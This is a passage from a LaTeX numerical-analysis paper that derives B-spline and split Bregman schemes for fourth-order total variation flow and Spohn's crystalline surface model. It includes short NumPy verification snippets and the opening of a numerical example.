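v = np.cos(2 * np.pi * np.arange(1, N + 1) / N)   # samples at x_1,...,x_N, zero sum
approx = scheme1_norm_sq(v[:-1], N)               # reduced vector in R^{N-1}
exact = 1.0 / (8 * np.pi**2)                      # ||cos(2 pi x)||^2_{H^{-1}_av}
print(approx, exact)
```

For this mode the discrete value works out to $h^2/(8\sin^2(\pi h))$, so the relative error behaves like $(\pi h)^2/3$, consistent with second order accuracy.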
\begin{remark}
When we apply $H^{-s}_{\mathrm{av}}(\mathbb{T})$ norm $(0<s<1)$ to $(\mbox{P}1)_h$, the discrete inverse Laplacian $(-\Delta_{\mathrm{av}})_h^{-s}$ can be introduced by the discrete Fourier transform (for example, see \cite{GMR19}).
\end{remark}
\begin{figure}[tb]
\centering
\includegraphics[scale=.8,clip]{plot_Bspline.pdf}
\caption{The second degree B-spline basis functions}
\label{Fig:Bspline}
\end{figure}
Our second scheme is to compute $\nabla(-\Delta_{\mathrm{av}})^{-1}$ directly. This requires piecewise polynomials of degree two with continuous derivatives. We define the second degree periodic B-spline basis functions (see Figure \ref{Fig:Bspline})
\begin{equation}
B_n(x) = \left\{\begin{array}{rl}
\dfrac{(x-x_{n-\frac{3}{2}})^2}{2h^2}&\mbox{if }x\in I_{n-1},\\
\dfrac{(x-x_{n-\frac{1}{2}})(x_{n+\frac{1}{2}}-x)}{h^2}+\dfrac{1}{2}&\mbox{if }x\in I_n,\\
\dfrac{(x_{n+\frac{3}{2}}-x)^2}{2h^2}&\mbox{if }x\in I_{n+1},\\
0&\mbox{otherwise}.
\end{array}\right.
\end{equation}
We identify $B_{-1}\equiv B_{N-1}$, $B_0\equiv B_N$ and $B_1\equiv B_{N+1}$. The B-spline basis functions have continuous derivative (see Figure \ref{Fig:Deriv_Bspline})
\begin{equation}
\nabla B_n(x) =\left\{\begin{array}{rl}
(x-x_{n-\frac{3}{2}})h^{-2}&\mbox{if }x\in I_{n-1},\\
2(x_n-x)h^{-2}&\mbox{if }x\in I_n,\\
-(x_{n+\frac{3}{2}}-x)h^{-2}&\mbox{if }x\in I_{n+1},\\
0&\mbox{otherwise}.
\end{array}\right.
\end{equation}
Therefore we have
\begin{equation}
-\Delta B_n(x) = \left\{\begin{array}{rl}
-h^{-2}&\mbox{if }x\in I_{n-1},\\
2h^{-2}&\mbox{if }x\in I_n,\\
-h^{-2}&\mbox{if }x\in I_{n+1},\\
0&\mbox{otherwise}.
\end{array}\right.
\end{equation}
Fix $v_h\in V_{h0}$ arbitrarily, then there exists $w_h\in \operatorname{span}\{B_1,\dots, B_N\}$ such that $w_h = (-\Delta_{\mathrm{av}})^{-1}v_h\in H^1_{\mathrm{av}}(\mathbb{T})$. It is easy to check that
\begin{equation}
\label{Eq:L1_Bspline}
\displaystyle\int_{\mathbb{T}}B_n(x)~dx = h\mbox{ for all }n=1,2,\dots, N.
\end{equation}
If $\sum_{n=1}^Nw_n=0$, then equation \eqref{Eq:L1_Bspline} implies $\sum_{n=1}^Nw_nB_n\in H^1_{\mathrm{av}}(\mathbb{T})$.
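The normalization $\int_{\mathbb{T}}B_n\,dx=h$ in \eqref{Eq:L1_Bspline} is easy to confirm by quadrature. The following sketch evaluates an interior basis function $B_n$ from its piecewise definition (the wrap-around of boundary indices is omitted for brevity, and the function name is ours):

```python
import numpy as np

def B(n, x, h):
    """Quadratic B-spline B_n on the grid x_m = m h (interior n, no wrap-around)."""
    xm32, xm12 = (n - 1.5) * h, (n - 0.5) * h
    xp12, xp32 = (n + 0.5) * h, (n + 1.5) * h
    out = np.zeros_like(x)
    m = (x >= xm32) & (x < xm12)                     # left piece on I_{n-1}
    out[m] = (x[m] - xm32)**2 / (2 * h**2)
    m = (x >= xm12) & (x < xp12)                     # middle piece on I_n
    out[m] = (x[m] - xm12) * (xp12 - x[m]) / h**2 + 0.5
    m = (x >= xp12) & (x < xp32)                     # right piece on I_{n+1}
    out[m] = (xp32 - x[m])**2 / (2 * h**2)
    return out

h = 1.0 / 8
dx = 1e-5
x = (np.arange(100000) + 0.5) * dx                   # midpoint quadrature nodes on [0,1]
integral = np.sum(B(4, x, h)) * dx
print(integral)                                      # ≈ h = 0.125
```

One can also check that $B_n(x_n)=3/4$, the peak value of the quadratic B-spline.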
Furthermore, we let
\begin{equation}
w_h = \displaystyle\sum_{n=1}^N w_nB_n\in H^1_{\mathrm{av}}(\mathbb{T}),\ \widetilde{\textbf{w}}=(w_1,\dots,w_N)^{\mathrm{T}}\in\mathbb{R}^N \mbox{ and } \textbf{w}=R_N\widetilde{\textbf{w}}\in\mathbb{R}^{N-1}.
\end{equation}
Then we have
\begin{equation}
v_h=-\Delta w_h = \displaystyle\sum_{n=1}^Nw_n (-\Delta B_n) = h^{-2}\sum_{n=1}^N(-w_{n-1}+2w_n-w_{n+1})\boldsymbol{1}_{I_n}\in V_{h0}.
\end{equation}
This implies
\begin{equation}
R_N\textbf{v}=\widetilde{\textbf{v}}= -\Delta_h\widetilde{\textbf{w}}=-\Delta_hR_N\textbf{w}=h^{-2}S_N^{\mathrm{T}}S_NR_N\textbf{w}.
\end{equation}
Multiplying the pseudo-inverse matrix $L_N$ yields
\begin{equation}
\textbf{v} =(-\Delta_{\mathrm{av}})_h\textbf{w}= h^{-2}A_N\textbf{w}.
\end{equation}
Therefore we have
\begin{equation}
\textbf{w} = (-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}=h^2A_N^{-1}\textbf{v}.
\end{equation}
\begin{figure}[tb]
\centering
\includegraphics[scale=.7,clip]{plot_Bspline_deriv.pdf}
\includegraphics[scale=.7,clip]{plot_Bspline_-Lap.pdf}
\caption{The derivative of second degree B-spline basis functions.}
\label{Fig:Deriv_Bspline}
\end{figure}
Combining the definition with equation \eqref{Lem:H-1av_norm} gives $\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 = \|\nabla w_h\|_{L^2(\mathbb{T})}^2$, where
\begin{equation}
\nabla w_h = \displaystyle\sum_{n=1}^Nw_n\nabla B_n
\end{equation}
is a piecewise linear function which satisfies
\begin{equation}
\nabla w_h(x_{n-1/2}) = (w_n-w_{n-1})h^{-1}\mbox{ for all }n=1,\dots, N.
\end{equation}
This implies
\begin{equation}
\nabla w_h = \displaystyle\sum_{n=1}^N(w_n-w_{n-1})h^{-1}\phi_{n-1/2} = (\nabla_h\widetilde{\textbf{w}})\cdot(\phi_{1/2},\dots,\phi_{N-1/2})^{\mathrm{T}},
\end{equation}
where
\begin{equation}
\phi_{n-1/2}(x) = \left\{\begin{array}{rl}
(x-x_{n-3/2})h^{-1}&\mbox{if }x\in I_{n-1},\\
(x_{n+1/2}-x)h^{-1}&\mbox{if }x\in I_n,\\
0&\mbox{otherwise}.
\end{array}\right.
\end{equation}
We identify $\phi_{-1/2}=\phi_{N-1/2}$, $\phi_{1/2}=\phi_{N+1/2}$ (see Figure \ref{Fig:tent}). It is easy to check that
\begin{equation}
\displaystyle\int_{\mathbb{T}}\phi_{n-1/2}(x)\phi_{m-1/2}(x)~dx = \left\{
\begin{array}{rl}
2h/3&\mbox{if }n=m,\\
h/6&\mbox{if }|n-m|=1,\\
0&\mbox{otherwise}
\end{array}\right.\label{Eq:mass_mat_phi}
\end{equation}
for all $n=1,\dots,N$. Therefore we have
\begin{align*}
\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 &= \|\nabla w_h\|_{L^2(\mathbb{T})}^2\\
&= (\nabla_h\widetilde{\textbf{w}})^{\mathrm{T}}\begin{pmatrix}
2h/3&h/6&0&\dots&0&h/6\\
h/6&2h/3&h/6&\dots&0&0\\
\vdots&&\ddots&&&\vdots\\
h/6&0&0&\dots&h/6&2h/3
\end{pmatrix}\nabla_h\widetilde{\textbf{w}}\\
&= \dfrac{1}{h}(S_NR_N\textbf{w})^{\mathrm{T}}M_NS_NR_N\textbf{w},
\end{align*}
where
\begin{equation}
M_N = \begin{pmatrix}
2/3&1/6&0&\dots&0&1/6\\
1/6&2/3&1/6&\dots&0&0\\
\vdots&&\ddots&&&\vdots\\
1/6&0&0&\dots&1/6&2/3
\end{pmatrix}\in\mathbb{R}^{N\times N}.
\end{equation}
Let
\begin{equation}
T=\begin{pmatrix}
a&0&\dots&0&b\\
b&a&\dots&0&0\\
\vdots&&\ddots&&\\
0&0&\dots&b&a\\
\end{pmatrix}\in\mathbb{R}^{N\times N},
\end{equation}
where $a=\dfrac{\sqrt{3}+1}{2\sqrt{3}}$ and $b = \dfrac{\sqrt{3}-1}{2\sqrt{3}}$, then $T^{\mathrm{T}}T=M_N$. Summarizing the above argument, our second scheme can be described as
\begin{align*}
\dfrac{\lambda}{2}\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 &= \dfrac{\lambda}{2h}(S_NR_N\textbf{w})^{\mathrm{T}}M_NS_NR_N\textbf{w}\\
&= \dfrac{\lambda}{2h}(S_NR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v})^{\mathrm{T}}T^{\mathrm{T}}TS_NR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}\\
&=\dfrac{\lambda h^3}{2}\|TS_NR_NA_N^{-1}\textbf{v}\|_2^2.
\end{align*}
Let $H = TS_NR_NA_N^{-1} = TJ\in\mathbb{R}^{N\times (N-1)}$ for simplicity of notation, then we have
\begin{equation}
\label{Eq:H-1_part2}
\dfrac{\lambda}{2}\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 = \dfrac{\lambda h^3}{2}\|H\textbf{v}\|_2^2.
\end{equation}
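The factorization $T^{\mathrm{T}}T=M_N$ can be verified directly: writing $T=aI+bP$ with the cyclic shift $P$, one has $T^{\mathrm{T}}T=(a^2+b^2)I+ab(P+P^{\mathrm{T}})$, and the chosen $a,b$ give $a^2+b^2=2/3$, $ab=1/6$. A sketch (for $N\ge3$; the helper name is ours):

```python
import numpy as np

def mass_factor(N):
    """Circulant factor T: a on the diagonal, b on the subdiagonal (cyclically)."""
    a = (np.sqrt(3) + 1) / (2 * np.sqrt(3))
    b = (np.sqrt(3) - 1) / (2 * np.sqrt(3))
    return a * np.eye(N) + b * np.roll(np.eye(N), -1, axis=1)

N = 8
T = mass_factor(N)
# mass matrix M_N of the periodic piecewise linear basis: 2/3 diagonal, 1/6 neighbors
M = (2 / 3) * np.eye(N) + (1 / 6) * (np.roll(np.eye(N), 1, axis=1)
                                     + np.roll(np.eye(N), -1, axis=1))
print(np.allclose(T.T @ T, M))   # True
```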
Applying equations \eqref{Eq:L2_part}, \eqref{Eq:H-1_part1} and \eqref{Eq:H-1_part2} to $(\mbox{P}2)_h$ yields the following two discretized problems:
\begin{subequations}
\begin{align}
&\displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|J(\textbf{u}-\textbf{f})\|_2^2+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right\},\label{Scheme:SB1}\\
&\displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|H(\textbf{u}-\textbf{f})\|_2^2+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right\}\label{Scheme:SB2},
\end{align}
\end{subequations}
where $\textbf{f}\in\mathbb{R}^{N-1}$ corresponds to the given data $f_h\in V_{h0}$ or $\textbf{f} = \textbf{u}^k$. Recall that the matrix $J$ is introduced by the approximation $\nabla(-\Delta_{\mathrm{av}})^{-1}\approx \nabla_hR_N(-\Delta_{\mathrm{av}})_h^{-1}$. On the other hand, we obtain $H$ by evaluating $\nabla(-\Delta_{\mathrm{av}})^{-1}$ exactly. Therefore \eqref{Scheme:SB1} can be regarded as an approximation of \eqref{Scheme:SB2}, which is equivalent to $(\mbox{P}2)_h$.
\begin{figure}[tb]
\centering
\includegraphics[scale=.8]{plot_tent.pdf}
\caption{The piecewise linear basis functions}
\label{Fig:tent}
\end{figure}
\section{Split Bregman framework}
\label{Sec:SplitBregman}
In this section, we review the alternating split Bregman framework in \cite{GO09} for the problem
\begin{equation}
\label{Prob:Generalized}
(\mbox{P}3K)_h\quad \displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right\},
\end{equation}
where $K\in\mathbb{R}^{N\times(N-1)}$ is equal to $J$ or $H$. Recall that $(\mbox{P}3K)_h$ is an approximation of the discrete problem for $(\mbox{P}0)$:
\begin{equation}
(\mbox{P}0K)_h\quad \displaystyle\mathop{\mathrm{minimize}}_{\textbf{u}\in\mathbb{R}^{N-1}}\left\{\|S_NR_N\textbf{u}\|_1+\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2\right\}.
\end{equation}
Let
\begin{equation}
\Psi(\textbf{u},\textbf{d}) = \|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2.
\end{equation}
The Bregman method replaces $\Psi(\textbf{u},\textbf{d})$ by its Bregman distance and iteratively solves
\begin{equation}
\label{Eq:Bregman}
(\textbf{u}^{k+1},\textbf{d}^{k+1}) = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{D_{\Psi}^{\textbf{p}^k}((\textbf{u},\textbf{d}),(\textbf{u}^k,\textbf{d}^k)) + \dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right\},
\end{equation}
where the Bregman distance $D_{\Psi}^{\textbf{p}^k}$ is defined as
\begin{equation}
D_{\Psi}^{\textbf{p}^k}((\textbf{u},\textbf{d}),(\textbf{u}^k,\textbf{d}^k)) = \Psi(\textbf{u},\textbf{d}) - \Psi(\textbf{u}^k,\textbf{d}^k)-\textbf{p}_u^k\cdot(\textbf{u}-\textbf{u}^k)-\textbf{p}_d^k\cdot(\textbf{d}-\textbf{d}^k),
\end{equation}
and $\textbf{p}^k = (\textbf{p}_u^k,\textbf{p}_d^k)\in \mathbb{R}^{N-1}\times\mathbb{R}^N$ is defined as
\begin{subequations}
\begin{align}
\textbf{p}_u^{k+1} &= \textbf{p}_u^k - \mu h(S_NR_N)^{\mathrm{T}}(S_NR_N\textbf{u}^{k+1}-\textbf{d}^{k+1})\mbox{ and }\textbf{p}_u^0 =\textbf{0}\in\mathbb{R}^{N-1}\\
\textbf{p}_d^{k+1} &= \textbf{p}_d^k - \mu h(\textbf{d}^{k+1}-S_NR_N\textbf{u}^{k+1})\mbox{ and }\textbf{p}_d^0=\textbf{0}\in\mathbb{R}^N.
\end{align}
\end{subequations}
Since $\Psi:\mathbb{R}^{N-1}\times\mathbb{R}^N\to\mathbb{R}$ is convex and lower semi-continuous, the Bregman distance $D_{\Psi}^{\textbf{p}^k}(\cdot,(\textbf{u}^k,\textbf{d}^k))$ is also convex and lower semi-continuous. The standard existence result of convex analysis (see \cite[Corollary 3.23]{Bre11}) then gives a minimizer $(\textbf{u}^{k+1},\textbf{d}^{k+1})$. Furthermore, by induction we can show that
\begin{equation}
\left(\Psi(\textbf{u},\textbf{d}) +\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}-\boldsymbol{\alpha}^{k}\|_2^2\right) - \left(D_{\Psi}^{\textbf{p}^k}((\textbf{u},\textbf{d}),(\textbf{u}^k,\textbf{d}^k)) + \dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2\right)
\end{equation}
is independent of $(\textbf{u},\textbf{d})$, where $\boldsymbol{\alpha}^{k+1}\in\mathbb{R}^N$ is defined as
\begin{equation}
\boldsymbol{\alpha}^{k+1} = \boldsymbol{\alpha}^k -(\textbf{d}^{k+1}-S_NR_N\textbf{u}^{k+1})\mbox{ and }\boldsymbol{\alpha}^{0}=\textbf{0}.
\end{equation}
This implies that the minimizer $(\textbf{u}^{k+1},\textbf{d}^{k+1})$ of problem \eqref{Eq:Bregman} satisfies
\begin{equation}
(\textbf{u}^{k+1},\textbf{d}^{k+1}) = \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N-1}, \textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}-\boldsymbol{\alpha}^{k}\|_2^2\right\}.
\end{equation}
This is the split Bregman iteration for the problem $(\mbox{P}3K)_h$.
Finally, we apply the alternating split Bregman algorithm and obtain
\begin{subequations}
\begin{empheq}[left=(\mbox{P}4K)_h\quad\empheqlbrace]{align}
\textbf{u}^{k+1} &= \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N-1}}\left\{\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2 + \dfrac{\mu h}{2}\|\textbf{d}^k-S_NR_N\textbf{u}-\boldsymbol{\alpha}^{k}\|_2^2\right\},\label{Eq:P4h2}\\
\textbf{d}^{k+1} &= \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}\in\mathbb{R}^N}\left\{\|\textbf{d}\|_1+\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}^{k+1}-\boldsymbol{\alpha}^{k}\|_2^2\right\}\label{Eq:P4h3},\\
\boldsymbol{\alpha}^{k+1} &= \boldsymbol{\alpha}^k-\textbf{d}^{k+1}+S_NR_N\textbf{u}^{k+1},
\end{empheq}
\end{subequations}
where $\textbf{f}\in\mathbb{R}^{N-1}$ is given data or $\textbf{f}=\textbf{u}^k$, $\boldsymbol{\alpha}^0 = \textbf{0}$, $\textbf{u}^0$ is given as $\textbf{0}$ or as the initial condition, and $\textbf{d}^0 = S_NR_N\textbf{u}^0$. This iteration satisfies the following convergence result.
\begin{lemma}[Theorem 3.2 of \cite{COS10}]
Suppose that $(\mbox{P}0K)_h$ has a minimizer $\textbf{u}^*\in\mathbb{R}^{N-1}$. Then the sequence $\textbf{u}^k$ determined by $(\mbox{P}4K)_h$ satisfies
\begin{equation}
\lim_{k\to\infty}\|S_NR_N\textbf{u}^{k+1}\|_1 + \dfrac{\lambda h^3}{2}\|K(\textbf{u}^{k+1}-\textbf{f})\|_2^2 = \|S_NR_N\textbf{u}^*\|_1 + \dfrac{\lambda h^3}{2}\|K(\textbf{u}^*-\textbf{f})\|_2^2.
\end{equation}
Furthermore, if the minimizer $\textbf{u}^*$ of $(\mbox{P}0K)_h$ is unique, then $\lim_{k\to\infty}\|\textbf{u}^{k+1}-\textbf{u}^*\|_2=0$.
\end{lemma}
The functional in \eqref{Eq:P4h2} is differentiable with respect to $\textbf{u}$, and the minimization \eqref{Eq:P4h3} can be reduced to the shrinking method
\begin{equation}
(\textbf{d}^{k+1})_n = \operatorname{shrink}\left((S_NR_N\textbf{u}^{k+1}+\boldsymbol{\alpha}^{k})_n,\dfrac{1}{\mu h}\right),
\end{equation}
where $(\textbf{v})_n$ is the $n$-th entry of the vector $\textbf{v}$ and
\begin{equation}
\label{Op:shrink}
\operatorname{shrink}(\rho,a) = \dfrac{\rho}{|\rho|}\max\{|\rho|-a,0\}.
\end{equation}
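The operator \eqref{Op:shrink} is the standard componentwise soft-thresholding map. As a quick illustrative sketch (using the common convention $\operatorname{shrink}(0,a)=0$, since the formula above is undefined at $\rho=0$):

```python
import numpy as np

def shrink(rho, a):
    # Soft-thresholding: shrink(rho, a) = (rho/|rho|) * max(|rho| - a, 0),
    # with the usual convention shrink(0, a) = 0 (the formula is 0/0 at rho = 0).
    return np.sign(rho) * np.maximum(np.abs(rho) - a, 0.0)

# Entries with |rho| <= a are mapped to zero; larger entries move toward zero by a.
print(shrink(np.array([-2.0, -0.3, 0.0, 0.5, 3.0]), 1.0))  # [-1.  0.  0.  0.  2.]
```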
Therefore, the problem $(\mbox{P}4K)_h$ reduces to
\begin{equation*}
(\mbox{P}5K)_h\quad \left\{\begin{array}{rl}
\textbf{u}^{k+1} &= \left(\lambda h^3K^{\mathrm{T}}K+\mu h(S_NR_N)^{\mathrm{T}}S_NR_N\right)^{-1}\left(\lambda h^3K^{\mathrm{T}}K\textbf{f}+\mu h(S_NR_N)^{\mathrm{T}}(\textbf{d}^k-\boldsymbol{\alpha}^{k})\right),\\
(\textbf{d}^{k+1})_n &= \operatorname{shrink}\left((S_NR_N\textbf{u}^{k+1}+\boldsymbol{\alpha}^{k})_n,\dfrac{1}{\mu h}\right)\mbox{ for all }n=1,\dots, N,\\
\boldsymbol{\alpha}^{k+1} &= \boldsymbol{\alpha}^k-\textbf{d}^{k+1}+S_NR_N\textbf{u}^{k+1},
\end{array}\right.
\end{equation*}
where $\textbf{f}\in\mathbb{R}^{N-1}$ is given data or $\textbf{f}=\textbf{u}^k$, $\boldsymbol{\alpha}^0 = \textbf{0}$, $\textbf{u}^0$ is given as $\textbf{0}$ or as the initial condition, and $\textbf{d}^0 = S_NR_N\textbf{u}^0$.
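For illustration, one step of $(\mbox{P}5K)_h$ may be sketched in NumPy as follows. The concrete matrices below are stand-ins chosen for the sketch only: \texttt{S} is taken as a periodic backward-difference matrix, \texttt{R} extends a vector in $\mathbb{R}^{N-1}$ to a zero-mean vector in $\mathbb{R}^N$, and \texttt{K} is a placeholder where $J$ or $H$ would be used; the paper's actual $S_N$ and $R_N$ from \eqref{Def:R} should be substituted for a real computation.

```python
import numpy as np

def split_bregman_step(u, d, alpha, f, K, S, R, lam, mu, h):
    """One iteration of (P5K)_h (sketch). K plays the role of J or H."""
    SR = S @ R
    # u-update: normal equations of the quadratic subproblem in (P4K)_h.
    A = lam * h**3 * (K.T @ K) + mu * h * (SR.T @ SR)
    b = lam * h**3 * (K.T @ (K @ f)) + mu * h * (SR.T @ (d - alpha))
    u_new = np.linalg.solve(A, b)
    # d-update: componentwise soft-thresholding with threshold 1/(mu*h).
    rho = SR @ u_new + alpha
    d_new = np.sign(rho) * np.maximum(np.abs(rho) - 1.0 / (mu * h), 0.0)
    # Bregman variable update.
    alpha_new = alpha - d_new + SR @ u_new
    return u_new, d_new, alpha_new

# Illustrative matrices (assumptions, not the paper's exact S_N and Def:R):
N = 8
h = 1.0 / N
S = np.eye(N) - np.roll(np.eye(N), 1, axis=0)          # periodic difference
R = np.vstack([np.eye(N - 1), -np.ones((1, N - 1))])   # zero-mean extension
K = S @ R                                              # placeholder for J or H
f = np.sin(2 * np.pi * h * np.arange(1, N))
u, d, alpha = f.copy(), (S @ R) @ f, np.zeros(N)
for _ in range(50):
    u, d, alpha = split_bregman_step(u, d, alpha, f, K, S, R, h**-3, 5 * h**-1, h)
```

The linear system in the $\textbf{u}$-update is symmetric positive definite (since $S_NR_N$ is injective), so a Cholesky factorization computed once could be reused across iterations.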
\begin{figure}[tb]
\centering
\includegraphics[clip]{plot_num_example3.pdf}
\caption{The difference between $K=J$ and $K=H$.}
\label{Fig:example3}
\end{figure}
\section{Shrinking method for Spohn's model}
\label{Sec:Spohn}
In this section, we consider the split Bregman framework for Spohn's model
\begin{equation}
u_t = -\Delta\left(\operatorname{div}\left(\beta\dfrac{\nabla u}{|\nabla u|}+|\nabla u|^{p-2}\nabla u\right)\right),
\end{equation}
which can be regarded as the gradient flow problem for energy functional
\begin{equation}
\widetilde{\Phi}(u) = \beta\displaystyle\int_{\mathbb{T}}|Du| + \dfrac{1}{p}\int_{\mathbb{T}}|Du|^p,
\end{equation}
where $\beta>0$ and $p>1$. This energy arises in a model for the relaxation of a crystalline surface below the roughening temperature (see, for example, \cite{KV10}). If we use the substitution $w = (Du)^p$, the alternating split Bregman method leads to a nonlinear problem. In this paper we always assume $p=3$, and we apply the constraint $d=Du$ to the term $|Du|^3$ as well. The alternating split Bregman method then gives
\begin{subequations}
\begin{empheq}[left=\empheqlbrace]{align}
\textbf{u}^{k+1} &= \displaystyle\mathop{\mathrm{argmin}}_{\textbf{u}\in\mathbb{R}^{N-1}}\left\{\dfrac{\lambda h^3}{2}\|K(\textbf{u}-\textbf{f})\|_2^2 + \dfrac{\mu h}{2}\|\textbf{d}^k-S_NR_N\textbf{u}-\boldsymbol{\alpha}^{k}\|_2^2\right\},\\
\textbf{d}^{k+1} &= \displaystyle\mathop{\mathrm{argmin}}_{\textbf{d}\in\mathbb{R}^N}\left\{\beta\|\textbf{d}\|_1+ \dfrac{1}{p}\|\textbf{d}\|_p^p +\dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}^{k+1}-\boldsymbol{\alpha}^{k}\|_2^2\right\}\label{Eq:Crystalline_energy},\\
\boldsymbol{\alpha}^{k+1} &= \boldsymbol{\alpha}^k-\textbf{d}^{k+1}+S_NR_N\textbf{u}^{k+1},
\end{empheq}
\end{subequations}
We consider the Euler-Lagrange equation for the minimization \eqref{Eq:Crystalline_energy}:
\begin{equation}
\beta\left(\dfrac{(\textbf{d}^{k+1})_n}{|(\textbf{d}^{k+1})_n|}\right)_{1\le n\le N} + \left((\textbf{d}^{k+1})_n|(\textbf{d}^{k+1})_n|^{p-2}\right)_{1\le n\le N} +\mu h(\textbf{d}^{k+1}-S_NR_N\textbf{u}^{k+1}-\boldsymbol{\alpha}^k)=0.
\end{equation}
For simplicity of notation, we let $x=(\textbf{d}^{k+1})_n$, $a=1/(\mu h)>0$ and $\rho = (S_NR_N\textbf{u}^{k+1}+\boldsymbol{\alpha}^k)_n$. This, combined with $p=3$, gives
\begin{equation}
\beta\dfrac{x}{|x|}+x|x|+\dfrac{1}{a}(x-\rho)=0.
\end{equation}
Suppose that $x>0$, then we have $a\beta<\rho$ and
\begin{equation}
x=\dfrac{1}{2}\left(-\dfrac{1}{a}+\sqrt{\dfrac{1}{a^2}-4\left(\beta-\dfrac{\rho}{a}\right)}\right).
\end{equation}
Similarly, supposing $x<0$ yields $\rho<-a\beta$ and
\begin{equation}
x = \dfrac{1}{2}\left(\dfrac{1}{a}-\sqrt{\dfrac{1}{a^2}-4\left(\beta+\dfrac{\rho}{a}\right)}\right).
\end{equation}
If $-a\beta\le\rho\le a\beta$, we let $x=0$. These observations provide the shrinkage operator of the form
\begin{equation}
\label{Eq:Shrink_for_Spohn}
x = \dfrac{\rho}{2a|\rho|}\left(-1+\sqrt{1+4a\max\{|\rho|-a\beta,0\}}\right).
\end{equation}
Applying this to equation \eqref{Eq:Crystalline_energy} gives
\begin{equation*}
\left\{\begin{array}{rl}
\textbf{u}^{k+1} &= \left(\lambda h^3K^{\mathrm{T}}K+\mu h(S_NR_N)^{\mathrm{T}}S_NR_N\right)^{-1}\left(\lambda h^3K^{\mathrm{T}}K\textbf{f}+\mu h(S_NR_N)^{\mathrm{T}}(\textbf{d}^k-\boldsymbol{\alpha}^{k})\right),\\
(\textbf{d}^{k+1})_n &=\dfrac{\mu h\rho_n^{k+1}}{2|\rho_n^{k+1}|}\left(-1+\sqrt{1+\dfrac{4}{\mu h}\max\left\{|\rho_n^{k+1}|-\dfrac{\beta}{\mu h},0\right\}}\right) \mbox{ for all }n=1,\dots, N,\\
\boldsymbol{\alpha}^{k+1} &= \boldsymbol{\alpha}^k-\textbf{d}^{k+1}+S_NR_N\textbf{u}^{k+1},
\end{array}\right.
\end{equation*}
where $\rho_n^{k+1}=(S_NR_N\textbf{u}^{k+1}+\boldsymbol{\alpha}^k)_n$.
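To make the derivation above concrete, the following snippet implements the scalar operator \eqref{Eq:Shrink_for_Spohn} and checks numerically that, whenever $x\neq0$, it satisfies the Euler-Lagrange equation $\beta x/|x| + x|x| + (x-\rho)/a = 0$. This is a sanity check of the closed form, not part of the scheme; the sample values of $\rho$, $a$ and $\beta$ are arbitrary.

```python
import math

def spohn_shrink(rho, a, beta):
    # Closed-form minimizer for p = 3: x = 0 when |rho| <= a*beta, otherwise
    # the root of beta*sign(x) + x*|x| + (x - rho)/a = 0 with sign(x) = sign(rho).
    m = max(abs(rho) - a * beta, 0.0)
    if m == 0.0:
        return 0.0
    return math.copysign(1.0, rho) / (2.0 * a) * (-1.0 + math.sqrt(1.0 + 4.0 * a * m))

for rho in (-3.0, -0.2, 0.0, 0.04, 1.0, 10.0):
    x = spohn_shrink(rho, a=0.1, beta=0.5)
    if x != 0.0:
        residual = 0.5 * math.copysign(1.0, x) + x * abs(x) + (x - rho) / 0.1
        assert abs(residual) < 1e-9   # Euler-Lagrange equation holds
```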
\begin{figure}[tb]
\centering
\subfloat[][$K=J$]{\includegraphics[clip,scale=.7]{plot_num_example1J.pdf}\label{Fig:K=J}}
\subfloat[][$K=H$]{\includegraphics[clip,scale=.7]{plot_num_example1H.pdf}\label{Fig:K=H}}
\caption{Numerical examples of the gradient flow.}
\label{Fig:gradient_flow}
\end{figure}
\section{Numerical example}
\label{Sec:NumExample}
\subsection{Example 1: Comparison of two schemes}
Here we show numerical examples of $(\mbox{P}5K)_h$. Note that equation \eqref{Eq:P4h3} implies that $\mu$ should satisfy $\mu=O(h^{-1})$. Moreover, combining this with equation \eqref{Eq:P4h2} shows that $\lambda = O(h^{-3})$ is necessary for a reasonable computation.
In this paper, we always regard $\mathbb{T}$ as an interval $[0,1]$ with periodic boundary condition.
Our first numerical example is the gradient flow \eqref{Eq:GradientFlow} with the initial condition
\begin{equation}
u^0(x) = \left\{\begin{array}{ll}
10(4-\log5)&\mbox{if }|x-1/2|\le 1/10,\\
